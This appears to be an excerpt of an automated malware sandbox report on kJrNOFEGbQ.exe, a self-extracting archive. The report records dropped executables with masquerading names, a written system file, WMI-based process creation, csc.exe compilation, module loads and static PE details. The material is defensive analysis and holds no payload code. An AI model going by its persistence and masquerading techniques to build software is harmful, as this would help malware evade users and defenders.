Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Section loaded: ntmarta.dll
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Section loaded: dpapi.dll
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Section loaded: mscoree.dll
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Section loaded: apphelp.dll
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Section loaded: kernel.appcore.dll
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Section loaded: version.dll
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Section loaded: windows.storage.dll
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Section loaded: wldp.dll
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Section loaded: profapi.dll
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Section loaded: cryptsp.dll
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Section loaded: rsaenh.dll
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Section loaded: cryptbase.dll
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Section loaded: sspicli.dll
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Section loaded: mscoree.dll
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Section loaded: kernel.appcore.dll
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Section loaded: version.dll
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Section loaded: windows.storage.dll
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Section loaded: wldp.dll
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Section loaded: profapi.dll
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Section loaded: cryptsp.dll
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Section loaded: rsaenh.dll
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Section loaded: cryptbase.dll
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Section loaded: sspicli.dll
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Section loaded: mscoree.dll
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Section loaded: kernel.appcore.dll
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Section loaded: version.dll
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Section loaded: windows.storage.dll
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Section loaded: wldp.dll
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Section loaded: profapi.dll
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Section loaded: cryptsp.dll
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Section loaded: rsaenh.dll
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Section loaded: cryptbase.dll
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Section loaded: sspicli.dll
Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Section loaded: mscoree.dll
Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Section loaded: apphelp.dll
Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Section loaded: version.dll
Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Section loaded: wldp.dll
Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Section loaded: profapi.dll
Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Section loaded: sspicli.dll
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Section loaded: mscoree.dll
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Section loaded: kernel.appcore.dll
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Section loaded: version.dll
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Section loaded: windows.storage.dll
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Section loaded: wldp.dll
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Section loaded: profapi.dll
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Section loaded: cryptsp.dll
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Section loaded: rsaenh.dll
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Section loaded: cryptbase.dll
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Section loaded: sspicli.dll
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Section loaded: mscoree.dll
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Section loaded: kernel.appcore.dll
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Section loaded: version.dll
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Section loaded: windows.storage.dll
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Section loaded: wldp.dll
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Section loaded: profapi.dll
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Section loaded: cryptsp.dll
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Section loaded: rsaenh.dll
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Section loaded: cryptbase.dll
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Section loaded: sspicli.dll
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Section loaded: mscoree.dll
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Section loaded: kernel.appcore.dll
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Section loaded: version.dll
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Section loaded: windows.storage.dll
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Section loaded: wldp.dll
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Section loaded: profapi.dll
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Section loaded: cryptsp.dll
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Section loaded: rsaenh.dll
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Section loaded: cryptbase.dll
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Section loaded: sspicli.dll
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Section loaded: mscoree.dll
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Section loaded: kernel.appcore.dll
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Section loaded: version.dll
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Section loaded: windows.storage.dll
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Section loaded: wldp.dll
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Section loaded: profapi.dll
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Section loaded: cryptsp.dll
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Section loaded: rsaenh.dll
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Section loaded: cryptbase.dll
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Section loaded: sspicli.dll
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Section loaded: mscoree.dll
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Section loaded: kernel.appcore.dll
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Section loaded: version.dll
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Section loaded: windows.storage.dll
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Section loaded: wldp.dll
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Section loaded: profapi.dll
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Section loaded: cryptsp.dll
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Section loaded: rsaenh.dll
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Section loaded: cryptbase.dll
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Section loaded: sspicli.dll
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Section loaded: mscoree.dll
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Section loaded: kernel.appcore.dll
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Section loaded: version.dll
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Section loaded: windows.storage.dll
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Section loaded: wldp.dll
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Section loaded: profapi.dll
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Section loaded: cryptsp.dll
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Section loaded: rsaenh.dll
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Section loaded: cryptbase.dll
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Section loaded: sspicli.dll

Source: C:\Users\user\Desktop\kJrNOFEGbQ.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\hyperComponentFontDhcp\Mscommon.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: kJrNOFEGbQ.exe

Static file information: File size 4234106 > 1048576

Source: kJrNOFEGbQ.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: kJrNOFEGbQ.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: kJrNOFEGbQ.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: kJrNOFEGbQ.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: kJrNOFEGbQ.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: kJrNOFEGbQ.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: kJrNOFEGbQ.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source: kJrNOFEGbQ.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: kJrNOFEGbQ.exe
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\flsapel1\flsapel1.pdb source: Mscommon.exe, 00000008.00000002.2004012692.00000000036BA000.00000004.00000800.00020000.00000000.sdmp

Source: kJrNOFEGbQ.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: kJrNOFEGbQ.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: kJrNOFEGbQ.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: kJrNOFEGbQ.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: kJrNOFEGbQ.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\hyperComponentFontDhcp\Mscommon.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\flsapel1\flsapel1.cmdline"
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\flsapel1\flsapel1.cmdline"			Jump to behavior

Source: C:\Users\user\Desktop\kJrNOFEGbQ.exe

File created: C:\hyperComponentFontDhcp\__tmp_rar_sfx_access_check_5332125

Jump to behavior

Source: kJrNOFEGbQ.exe

Static PE information: section name: .didat

Source: C:\Users\user\Desktop\kJrNOFEGbQ.exe	Code function: 0_2_0037F640 push ecx; ret	0_2_0037F653
Source: C:\Users\user\Desktop\kJrNOFEGbQ.exe	Code function: 0_2_0037EB78 push eax; ret	0_2_0037EB96
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Code function: 8_2_00007FFD9BD261CF push esp; retf	8_2_00007FFD9BD261D1
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Code function: 8_2_00007FFD9BD235B5 push ds; retf	8_2_00007FFD9BD235BB
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Code function: 8_2_00007FFD9C1B812C pushad ; retn 5EDDh	8_2_00007FFD9C1B819D
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Code function: 32_2_00007FFD9BB263C0 push ecx; ret	32_2_00007FFD9BB263EA
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Code function: 32_2_00007FFD9BB26219 push eax; ret	32_2_00007FFD9BB2622A
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Code function: 32_2_00007FFD9BB2647D push ecx; ret	32_2_00007FFD9BB2648A
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Code function: 32_2_00007FFD9BAF53CC pushad ; retf	32_2_00007FFD9BAF53D2
Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Code function: 38_2_00007FFD9BAC53CC pushad ; retf	38_2_00007FFD9BAC53D2
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Code function: 41_2_00007FFD9BAE53CC pushad ; retf	41_2_00007FFD9BAE53D2
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Code function: 44_2_00007FFD9BAE53CC pushad ; retf	44_2_00007FFD9BAE53D2

Persistence and Installation Behavior

Creates processes via WMI

Source: C:\hyperComponentFontDhcp\Mscommon.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\hyperComponentFontDhcp\Mscommon.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\hyperComponentFontDhcp\Mscommon.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\hyperComponentFontDhcp\Mscommon.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\hyperComponentFontDhcp\Mscommon.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\hyperComponentFontDhcp\Mscommon.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\hyperComponentFontDhcp\Mscommon.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\hyperComponentFontDhcp\Mscommon.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\hyperComponentFontDhcp\Mscommon.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\hyperComponentFontDhcp\Mscommon.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\hyperComponentFontDhcp\Mscommon.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\hyperComponentFontDhcp\Mscommon.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\hyperComponentFontDhcp\Mscommon.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\hyperComponentFontDhcp\Mscommon.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\hyperComponentFontDhcp\Mscommon.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Infects executable files (exe, dll, sys, html)

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

System file written: C:\Windows\System32\SecurityHealthSystray.exe

Jump to behavior

Source: C:\hyperComponentFontDhcp\Mscommon.exe	File created: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Windows\System32\SecurityHealthSystray.exe	Jump to dropped file
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	File created: C:\Users\user\Desktop\oGeTRkCA.log	Jump to dropped file
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	File created: C:\Users\user\Desktop\spksuybo.log	Jump to dropped file
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	File created: C:\Users\user\Desktop\bhUNaLwZ.log	Jump to dropped file
Source: C:\hyperComponentFontDhcp\Mscommon.exe	File created: C:\Users\user\Desktop\PIewODkQ.log	Jump to dropped file
Source: C:\hyperComponentFontDhcp\Mscommon.exe	File created: C:\ProgramData\SoftwareDistribution\cmd.exe	Jump to dropped file
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	File created: C:\Users\user\Desktop\RrReMzQm.log	Jump to dropped file
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	File created: C:\Users\user\Desktop\CXEIeahW.log	Jump to dropped file
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	File created: C:\Users\user\Desktop\sfNsKLIr.log	Jump to dropped file
Source: C:\hyperComponentFontDhcp\Mscommon.exe	File created: C:\Users\user\Desktop\FrRytwYk.log	Jump to dropped file
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	File created: C:\Users\user\Desktop\hJqUpVHL.log	Jump to dropped file
Source: C:\hyperComponentFontDhcp\Mscommon.exe	File created: C:\Users\user\Desktop\wwCruhPB.log	Jump to dropped file
Source: C:\hyperComponentFontDhcp\Mscommon.exe	File created: C:\Users\user\Desktop\AEzAQzJw.log	Jump to dropped file
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	File created: C:\Users\user\Desktop\GTFZlGXP.log	Jump to dropped file
Source: C:\hyperComponentFontDhcp\Mscommon.exe	File created: C:\Users\user\Desktop\XDtENRtz.log	Jump to dropped file
Source: C:\hyperComponentFontDhcp\Mscommon.exe	File created: C:\Users\user\Desktop\JmTPAbOe.log	Jump to dropped file
Source: C:\hyperComponentFontDhcp\Mscommon.exe	File created: C:\Users\user\Desktop\SzUnVzkJ.log	Jump to dropped file
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	File created: C:\Users\user\Desktop\vwiBQQWj.log	Jump to dropped file
Source: C:\hyperComponentFontDhcp\Mscommon.exe	File created: C:\Users\user\Desktop\lZeSZrOV.log	Jump to dropped file
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	File created: C:\Users\user\Desktop\WmSvTfGg.log	Jump to dropped file
Source: C:\hyperComponentFontDhcp\Mscommon.exe	File created: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Jump to dropped file
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	File created: C:\Users\user\Desktop\zepZsevX.log	Jump to dropped file
Source: C:\hyperComponentFontDhcp\Mscommon.exe	File created: C:\Users\user\Desktop\qVgkgWEP.log	Jump to dropped file
Source: C:\hyperComponentFontDhcp\Mscommon.exe	File created: C:\Users\user\Desktop\jXskDIJa.log	Jump to dropped file
Source: C:\hyperComponentFontDhcp\Mscommon.exe	File created: C:\Users\user\Desktop\BjUpXdep.log	Jump to dropped file
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	File created: C:\Users\user\Desktop\KAZQIQEM.log	Jump to dropped file
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	File created: C:\Users\user\Desktop\cNoChqRS.log	Jump to dropped file
Source: C:\hyperComponentFontDhcp\Mscommon.exe	File created: C:\Users\user\Desktop\RCtfAzVO.log	Jump to dropped file
Source: C:\hyperComponentFontDhcp\Mscommon.exe	File created: C:\Users\Public\Libraries\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Jump to dropped file
Source: C:\hyperComponentFontDhcp\Mscommon.exe	File created: C:\Users\user\Desktop\iaQciIuf.log	Jump to dropped file
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	File created: C:\Users\user\Desktop\TnEFcwnq.log	Jump to dropped file
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	File created: C:\Users\user\Desktop\QCZpVjcx.log	Jump to dropped file
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	File created: C:\Users\user\Desktop\NDzgjDBy.log	Jump to dropped file
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	File created: C:\Users\user\Desktop\BpLaswaY.log	Jump to dropped file
Source: C:\hyperComponentFontDhcp\Mscommon.exe	File created: C:\Users\user\Desktop\KVMxlGUc.log	Jump to dropped file
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	File created: C:\Users\user\Desktop\iXYuZrQJ.log	Jump to dropped file
Source: C:\hyperComponentFontDhcp\Mscommon.exe	File created: C:\Users\user\Desktop\WGSwrSeE.log	Jump to dropped file
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	File created: C:\Users\user\Desktop\JVsHHpbK.log	Jump to dropped file
Source: C:\hyperComponentFontDhcp\Mscommon.exe	File created: C:\Users\user\Desktop\dwWdpxyo.log	Jump to dropped file
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	File created: C:\Users\user\Desktop\bZkuwcVU.log	Jump to dropped file
Source: C:\hyperComponentFontDhcp\Mscommon.exe	File created: C:\Users\user\Desktop\RTAxOVPQ.log	Jump to dropped file
Source: C:\hyperComponentFontDhcp\Mscommon.exe	File created: C:\Users\user\Desktop\LSnFHGjW.log	Jump to dropped file
Source: C:\hyperComponentFontDhcp\Mscommon.exe	File created: C:\Users\user\Desktop\SIrnFmDG.log	Jump to dropped file
Source: C:\hyperComponentFontDhcp\Mscommon.exe	File created: C:\Users\user\Desktop\fplMbujm.log	Jump to dropped file
Source: C:\Users\user\Desktop\kJrNOFEGbQ.exe	File created: C:\hyperComponentFontDhcp\Mscommon.exe	Jump to dropped file
Source: C:\hyperComponentFontDhcp\Mscommon.exe	File created: C:\Users\user\Desktop\vIyiJTTD.log	Jump to dropped file
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	File created: C:\Users\user\Desktop\gVlLDILN.log	Jump to dropped file

Source: C:\hyperComponentFontDhcp\Mscommon.exe

File created: C:\ProgramData\SoftwareDistribution\cmd.exe

Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

File created: C:\Windows\System32\SecurityHealthSystray.exe

Jump to dropped file

Source: C:\hyperComponentFontDhcp\Mscommon.exe	File created: C:\Users\user\Desktop\RCtfAzVO.log	Jump to dropped file
Source: C:\hyperComponentFontDhcp\Mscommon.exe	File created: C:\Users\user\Desktop\SzUnVzkJ.log	Jump to dropped file
Source: C:\hyperComponentFontDhcp\Mscommon.exe	File created: C:\Users\user\Desktop\KVMxlGUc.log	Jump to dropped file
Source: C:\hyperComponentFontDhcp\Mscommon.exe	File created: C:\Users\user\Desktop\iaQciIuf.log	Jump to dropped file
Source: C:\hyperComponentFontDhcp\Mscommon.exe	File created: C:\Users\user\Desktop\RTAxOVPQ.log	Jump to dropped file
Source: C:\hyperComponentFontDhcp\Mscommon.exe	File created: C:\Users\user\Desktop\PIewODkQ.log	Jump to dropped file
Source: C:\hyperComponentFontDhcp\Mscommon.exe	File created: C:\Users\user\Desktop\wwCruhPB.log	Jump to dropped file
Source: C:\hyperComponentFontDhcp\Mscommon.exe	File created: C:\Users\user\Desktop\fplMbujm.log	Jump to dropped file
Source: C:\hyperComponentFontDhcp\Mscommon.exe	File created: C:\Users\user\Desktop\WGSwrSeE.log	Jump to dropped file
Source: C:\hyperComponentFontDhcp\Mscommon.exe	File created: C:\Users\user\Desktop\LSnFHGjW.log	Jump to dropped file
Source: C:\hyperComponentFontDhcp\Mscommon.exe	File created: C:\Users\user\Desktop\BjUpXdep.log	Jump to dropped file
Source: C:\hyperComponentFontDhcp\Mscommon.exe	File created: C:\Users\user\Desktop\jXskDIJa.log	Jump to dropped file
Source: C:\hyperComponentFontDhcp\Mscommon.exe	File created: C:\Users\user\Desktop\JmTPAbOe.log	Jump to dropped file
Source: C:\hyperComponentFontDhcp\Mscommon.exe	File created: C:\Users\user\Desktop\AEzAQzJw.log	Jump to dropped file
Source: C:\hyperComponentFontDhcp\Mscommon.exe	File created: C:\Users\user\Desktop\qVgkgWEP.log	Jump to dropped file
Source: C:\hyperComponentFontDhcp\Mscommon.exe	File created: C:\Users\user\Desktop\XDtENRtz.log	Jump to dropped file
Source: C:\hyperComponentFontDhcp\Mscommon.exe	File created: C:\Users\user\Desktop\FrRytwYk.log	Jump to dropped file
